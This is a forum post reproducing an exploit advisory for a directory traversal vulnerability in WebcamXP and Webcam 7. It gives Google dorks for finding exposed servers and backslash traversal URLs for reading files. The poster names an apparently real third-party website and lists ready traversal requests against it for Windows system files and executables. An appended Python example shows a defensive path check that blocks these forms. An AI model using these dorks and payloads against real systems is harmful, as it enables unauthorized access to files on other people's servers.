crys18
Posted February 23, 2012

# Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability
# Google Dork: "powered by webcamxp" xhtml css
# Google Dork: "powered by webcam 7"
# Date: 2/22/2012
# Author: Silent Dream
# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe
# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe
# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32
# Tested on: Windows XP
# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.

http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini

Anyway, I ran some tests and also found some vulnerable sites.
e.g.:
http://dangkiem.com

With this exploit I can access files on that server.
e.g.:
http://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
http://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini
..................
http://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Windows\Explorer.exe
http://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Program Files\Windows Media Player\wmplayer.exe
..................

Pretty much anything, as long as we know where it is located and what it is called.
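Added example, not part of the original post and not WebcamXP's own code: a request-path check for a Windows-hosted web server that treats backslashes as separators, shown beside a hypothetical forward-slash-only filter of the kind the backslash variant described in the advisory gets past. The web root `C:\webcam\www` and all function names are assumptions made for the illustration.

```python
import ntpath
from urllib.parse import unquote

# Hypothetical web root, assumed for this example.
WEB_ROOT = r"C:\webcam\www"


def naive_is_safe(url_path):
    """Hypothetical weak filter: only looks for forward-slash dot-dot
    sequences (raw or percent-encoded), so "..\\" is never noticed."""
    return "../" not in unquote(url_path)


def resolve_under_root(url_path, root=WEB_ROOT):
    """Map a request path to a file path under root.

    Returns the normalized Windows path, or None when the request
    would resolve to anything outside root.
    """
    decoded = unquote(url_path)  # handles %5c and %2f
    if "\x00" in decoded:
        return None
    # Windows file APIs accept both separators, so the check must too.
    relative = decoded.replace("/", "\\").lstrip("\\")
    # normpath collapses every ".." segment; a drive-qualified request
    # such as "C:\Windows" replaces the root entirely and is caught below.
    candidate = ntpath.normpath(ntpath.join(root, relative))
    root_norm = ntpath.normpath(root)
    cand_cmp = ntpath.normcase(candidate)  # NTFS paths are case-insensitive
    root_cmp = ntpath.normcase(root_norm)
    if cand_cmp == root_cmp or cand_cmp.startswith(root_cmp + "\\"):
        return candidate
    return None


if __name__ == "__main__":
    # Constructed request paths following the pattern in the advisory.
    samples = [
        "/img/cam1.jpg",
        "/..\\..\\..\\boot.ini",
        "/..%5c..%5c..%5cWindows%5cwin.ini",
        "/../..\\..\\Windows\\win.ini",
    ]
    for path in samples:
        print(f"{path!r:45} naive_ok={naive_is_safe(path)!s:5} "
              f"resolved={resolve_under_root(path)}")
```

The decision is made on the normalized result, not on substrings of the request, which is why the raw, percent-encoded and mixed-separator forms are all rejected by the same comparison.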